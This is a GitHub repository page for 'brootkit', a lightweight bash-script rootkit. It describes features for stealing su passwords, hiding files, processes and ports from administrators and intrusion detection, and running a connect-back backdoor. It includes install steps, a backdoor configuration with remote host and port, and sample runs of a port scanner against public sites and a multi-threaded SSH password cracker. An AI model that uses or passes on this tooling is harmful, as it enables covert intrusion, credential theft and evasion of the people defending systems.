Skip to content

Lightweight rootkit implemented by bash shell scripts v0.10

Notifications You must be signed in to change notification settings

changliwei/brootkit

 
 

Repository files navigation

######BROOTKIT Lightweight rootkit implemented using bash shell scripts v0.10

by wzt 2015   wzt.wzt@gmail.com

If bash shell scripts can be designed for security tools like chkrootkit
or rkhunter, so too can it be implemented for a rootkit.

######FEATURES 1. more hidable ability against admintrator or hids. 2. su passwd thief. 3. hide file and directories. 4. hide process. 5. hide network connections. 6. connect backdoor. 7. multi thread port scanner. 8. http download. 9. multi thread ssh passwd crack.

######TARGET OS 1. centos 2. rhel 3. ubuntu 4. debian 5. fedora 6. freebsd

######TODO 1. sudo thief support.

######INSTALL

Linux distribution systems.

1. edit br.conf first

  brootkit config file.

  #these ports will be hidden: port1,port2,...,portn.
  HIDE_PORT               8080,8899
  #these files will be hidden: file1,file2,...,filen.
  HIDE_FILE               br.conf,bashbd.sh,brootkit,.bdrc,brdaemon
  #these processes will be hidden: process1,process2,...,processn.
  HIDE_PROC               bashbd,brootkit,pty.spawn,brdaemon
  #the connect back host domain name or ip address.
  REMOTE_HOST             localhost
  #the connect back host port.
  REMOTE_PORT             8080
  #the connect backdoor base sleep time.
  SLEEP_TIME              60

2. ./install.sh

3. multi thread port scanner.

  [root@localhost brootkit]$ ./brscan.sh
  ./brscan.sh <-p> [-n|-t|-o|-h] <remote_host>

  option:
  -p              ports, pattern: port1,port2,port3-port7,portn...
  -n              thread num, default is 10
  -t              timeout, default is 30s
  -o              results write into log file, default is brscan.log
  -h              help information.

  exp:
  ./brscan.sh -p 21,22,23-25,80,135-139,8080 -t 20 www.cloud-sec.org
  ./brscan.sh -p 1-65525 -n 200 -t 20 www.cloud-sec.org

  [root@localhost brootkit]# ./brscan.sh -p 21,22,23-25,80,135-139,8080 -t 5 -n 20 www.wooyun.org
  host: www.wooyun.org | total ports: 10 | thread num: 10 timeout: 5 | logfile: brscan.log

  thread<0    >           --              pid <57053>     -->     21
  thread<1    >           --              pid <57054>     -->     22
  thread<2    >           --              pid <57055>     -->     23
  thread<3    >           --              pid <57056>     -->     24
  thread<4    >           --              pid <57057>     -->     80
  thread<5    >           --              pid <57058>     -->     135
  thread<6    >           --              pid <57059>     -->     136
  thread<7    >           --              pid <57060>     -->     137
  thread<8    >           --              pid <57061>     -->     138
  thread<9    >           --              pid <57070>     -->     8080

  [>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>]     10/10     6 s

  www.wooyun.org: 80

4. multi thread ssh passwd crack.
  [root@localhost brootkit]# ./sshcrack.sh
  ./sshcrack.sh <-h host> <-u user> <-p passwd> [-t timeout] [-n threadnum] [-o logfile]

  option:
  -h              host name or host list file.
  -u              user name or user list file.
  -p              single passwd or passwd list file.
  -t              connect timeout, defalut is 5s.
  -n              thread num, default is 1.
  -o              log file.
  -v              display help information.

  exp:

  ./sshcrack.sh -h 192.168.215.148 -u wzt -p passwd.lst
  ./sshcrack.sh -h 192.168.215.148 -u wzt -p passwd.lst -n 10 -t 2
  ./sshcrack.sh -h 192.168.215.148 -u user.lst -p passwd.lst -n 10 -t 2
  ./sshcrack.sh -h host.lst -u user.lst -p passwd.lst -n 10 -t 2

  [root@localhost brootkit]# ./sshcrack.sh -h 192.168.215.148 -u wzt -p passwd.lst -n 6
  host: 1 | users: 1 | passwd: 28 thread: 6 | timeout: 10 | logfile: sshcrack.log

  Thread[ 1]      wzt@192.168.215.148             ==>     [e               ]      [failed]         3
  Thread[ 2]      wzt@192.168.215.148             ==>     [a               ]      [failed]         3
  Thread[ 3]      wzt@192.168.215.148             ==>     [d               ]      [failed]         3
  Thread[ 4]      wzt@192.168.215.148             ==>     [giveshell       ]      [success]        6
  Thread[ 5]      wzt@192.168.215.148             ==>     [123456          ]      [failed]         3
  Thread[ 6]      wzt@192.168.215.148             ==>     [fd              ]      [failed]         3

  waiting all threads to finsh...

Freebsd system
on the modern freebsd system root use csh by default, the other users
use sh default. this version of brootkit can only support sh based features.

1. edit brsh.conf first

brshootkit config file, only one argument support.

  #this port will be hidden.
  HIDE_PORT               8080
  #these files will be hidden.
  HIDE_FILE               brsh
  #these process will be hidden.
  HIDE_PROC               sh
  #the connect back host domain name or ip address.
  REMOTE_HOST             localhost
  #the connect back host port.
  REMOTE_PORT             8080
  #the connect backdoor base sleep time.
  SLEEP_TIME              60

2. ./install.sh

######SOURCE https://github.com/cloudsec/brootkit

About

Lightweight rootkit implemented by bash shell scripts v0.10

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages

  • Shell 100.0%